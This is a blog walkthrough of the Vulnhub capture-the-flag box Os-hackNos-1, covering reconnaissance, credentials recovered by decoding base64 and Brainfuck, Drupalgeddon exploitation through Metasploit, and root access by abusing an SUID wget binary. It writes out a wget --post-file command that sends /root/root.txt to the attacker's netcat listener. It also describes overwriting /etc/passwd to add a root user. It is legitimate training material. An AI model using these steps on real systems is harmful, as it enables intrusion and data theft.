This time we’re doing the VM Os-hackNos-1 from Vulnhub its an intermediate box from created by Rahul Gehlaut and is part of the hackNos Series.

Once we have the IP address of the box from running a netdiscover cmd we can start up nmap and take a look at what is running on the box.

So this should be an easy one, if the 2 ports open are anything to go on. We only really have one port to start with as we dont have any creds to use on the SSH port. So with that in mind we should check out the 80 port and what site it’s running.

It’s just the default Apache install page, and after looking at the source code there was nothing of interest there either. So if we follow our normal enumeration methodology we should now try to find any hidden dir’s that might be on the web server.

It seems like the site is running a Drupal blog, which is a little different to the normal blog we usually see on CTF’s which would be WordPress. So we should take a look at the blog and see what we can find out.

It seems like we might have a user named “James”. I’ve not really done a lot of Drupal hacking up to this point, so let’s jump over to google and see if there is a drupal eqivilent to WPScan. There used to be a tool called DPScan but I couldnt find anything new on it and the articles I found were from 8 years ago.

Everything else seems like the default Drupal pages and settings etc. I think we’re missing something. We should go back to our enumeration and see if we might have missed something. ??

We’re going to switch our enumeration tool for this scan though as we want to scan for dir’s and files this time. So we’ll use dirsearch which is a really nice python based directory and file bruteforce scanner.

we can set it all up with this cmd:

./dirsearch.py -u 192.168.1.194 -e txt -w /usr/share/wordlists/rockyou.txt -t 25

which basically aims the scan at our victim IP address, looks for .txt extensions with the -e flag, uses the rockyou wordlist by us giving it the -w flag and finally to make it all go a little faster we have given it 25 threads with the -t flag.

After a few false starts (not giving it the correct wordlist or the correct flags) giving it the -f flag to force the .txt extension on the wordlist payloads we got a hit really quickly. It’s returned a file called alexander.txt

We can navigate to the file and hopefully it’ll give us that we need to move forward.

Awesome, it looks like a base64 encoded string, which we can decode and see what it says by echoing the string on the cmd line and piping it to base64 -d

When we decode the string it returns a very strange looking string, but fortunately I have seen similar before and recognize it as the esoteric programming language called Brainf*ck we can use an online interpreter to execute the code and see what the output is.

Now this is what we have been looking for, we already made a note of the user James from the Drupal blog but now we have a password to go with it. We should try to use them on the SSH port to see if we can log onto the box. If that doesn't work then we will try to use them to log into the Drupal panel. So SSH first.

It didn’t work, fair enough. It would have made the initial foothold easier, but there are more ways for us to access the box. We should make sure the creds are real by using them to log into the Drupal panel and once we know if they work or not we can then start trying to use them to exploit the box.

We’re in, let’s jump back over to google and do a bit of research on exploiting Drupal. I know of an attack called Drupalgeddon but never really had use of it before. So we should start our research there and see if we can use it against this box.

After a quick google I found that Metasploit has a module that can scan and exploit the vulnerability. We should fire up msfconsole and see if we can get it to work.

After loading the module and changing some of the options to reflect our victims box.

Perfect, it worked as expected and we are now on the box with a Meterpreter shell. :-)

Get Andrew Hilton’s stories in your inbox

Join Medium for free to get updates from this writer.

Let’s have a look around the box and upload one of our enumeration scripts to try and find the way forward. After trying a few times to upload the script I was unable to chmod it to be able to actually run it though due to permission issues. So without falling further down the rabbit hole, we should take a look around the box manually to see if there is anything obvious on there that might help us to move forward.

Whilst looking around we find the user.txt flag. So now lets move on and try to find out what we can run or see that we are not meant to be able to. We can use the excellent g0tMi1k linux priv esc cheat sheet to help us.

We can run a cmd that will search the box for all of the files with SGID or SUID bits set.

As you can see above there is a weird one set on the wget binary. If we check out the GTFOBins site we can get an understanding of how to use wget to exploit it and hopefully give us root privs.

So now that we know we can run the above highlighted cmd we can use it to read us the root flag file. We know the user flag was called user.txt so we can take a guess that the root flag is called root.txt and its usually located in /root/root.txt

So lets run the cmd wget — post-file=/root/root.txt 192.168.1.183 this should give us the file as long as we have a nc listener open and waiting for the file.

On the victim box we run:

then on our machine we run nc -lnvp 80:

There is it, that's game over.

****************************<UPDATE>****************************

We were able to read the file but it didn't feel finished as we didn't actually get access as the root user on the box, so I went back to google and GTFOBins to try to figure out a way of fully exploiting the box using wget.

The way I found was to use a few other binary's that had sticky bits set.

Press enter or click to view image in full size

So now we have the potential to download and upload files from the box (namely the passwd file) and because we can exploit wget and run it as the root user we should be able to modify the passwd file, insert our own user into it, re-upload it to the box and have it accepted as its all being done by the “root” user :-)

Ok, let’s jump back into this and try to get full root access. First we need to send the passwd file to ourselves!

Now we have it we can copy it into a file we make called passwd and add a new user to it. We can create this new user by using the openssl cmd below:

Press enter or click to view image in full size

next we need to add ourselves to the passwd file copying the same syntax as the actual root user.

Now that is done, we have to host it ready to be pulled back using the wget cmd on the victim box, once it is copied back to their box it should be as simple as using su and giving it the password we just used when creating our user “password123”.

The last thing is su’ing to the new hilton user.

There we go, full root access to the box and again we can read the root.txt flag. That feels a lot more like actually completing the box compared to the first time.

I had so much fun on this CTF and actually learnt a lot on this one, I had not seen wget used as a priv esc vector before but again the awesome GTFOBins site told me what I needed to know and helped us root the box.

Thanks to Rahul Gehlaut for creating the VM and for Vulnhub for hosting it and all the other great VM’s on their site.

If you found this article helpful, please give it some 👏 and share it with anyone who you think might find it helpful! + Feedback and coffees are always welcome! 😄

Take care and hopefully I’ll see you back here soon for more content and walkthroughs.

Os_HackNos_1 — Vulnhub.com

Get Andrew Hilton’s stories in your inbox